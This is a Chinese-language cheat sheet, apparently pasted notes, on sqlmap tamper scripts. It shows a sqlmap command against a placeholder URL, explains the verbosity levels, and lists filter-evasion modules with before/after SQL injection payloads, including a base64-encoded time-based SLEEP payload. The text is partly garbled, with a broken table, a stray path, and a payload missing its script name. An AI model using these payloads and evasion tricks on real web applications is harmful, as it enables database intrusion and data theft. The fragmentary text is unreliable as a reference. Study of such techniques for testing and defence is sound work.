space2plus.py
这个脚本
sqlmap.py -u http://www.xx.com/xxxx.php?id=29 -v 3 --dbs space2plus.py
| 脚本名称 | 适用数据库 | 作用 | 使用脚本前 | 使用脚本后 |
| :———————-: | :————: | :——————: | :—————————-: | :—————————-: |
| space2plus.py | ALL | 用加号替换空格 | SELECT * FROM users
| SELECT+*+FROM+users
|
- v
的作用是 :观察sqlmap对一个点是进行了怎样的尝试判断以及读取数据的,可以使用-v参数 ,共有七个等级,默认为1
0)、只显示python错误以及严重的信息。
1)、同时显示基本信息和警告信息。(默认)
2、同时显示debug信息。
3)、同时显示注入的payload。
4)、同时显示HTTP请求。
5)、同时显示HTTP响应头。
6)、同时显示HTTP响应页面。
如果你想看到sqlmap发送的测试payload最好的等级就是3。sqlmap -u [url] --tamper [模块名]
usr/share/golismero/tools/sqlmap/tamper
下1' AND SLEEP(5)#
使用脚本后:MScgQU5EIFNMRUVQKDUpIw==
space2plus.py
适用数据库:ALL
作用:用加号替换空格
使用脚本前:SELECT id FROM users
使用脚本后:SELECT+id+FROM+users
apostrophemask.py
适用数据库:ALL
作用:将引号替换为utf-8,用于过滤单引号
使用脚本前:1 AND '1'='1
使用脚本后:1 AND %EF%BC%871%EF%BC%87=%EF%BC%871
space2randomblank.py
适用数据库:ALL
作用:将空格替换为其他有效字符
使用脚本前:SELECT id FROM users
使用脚本后:SELECT%0Did%0DFROM%0Ausers
nonrecursivereplacement.py
适用数据库:ALL
作用:作为双重查询语句,用双重语句替代预定义的sql关键字(适用于非常弱的自定义过滤 器,例如将select替换为空)
使用脚本前:1 UNION SELECT 2--
使用脚本后:1 UNIOUNIONN SELESELECTCT 2--
unionalltounion.py
适用数据库:ALL
作用:将union allselect
替换为unionselect
使用脚本前:-1 UNION ALL SELECT
使用脚本后:-1 UNION SELECT
chardoubleencode.py
适用数据库:ALL
作用:对给定的payload全部字符使用双重url编码(不处理已经编码的字符)
使用脚本前:SELECT FIELD FROM%20TABLE
使用脚本后:%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545
randomcomments.py
适用数据库:ALL
作用:用注释符分割sql关键字
使用脚本前:tamper('INSERT')
使用脚本后:I/**/N/**/SERT
appendnullbyte.py
适用数据库:ALL
作用:在有效载荷的结束位置加载null字节字符编码
使用脚本前:1 AND 1=1
使用脚本后:1 AND 1=1%00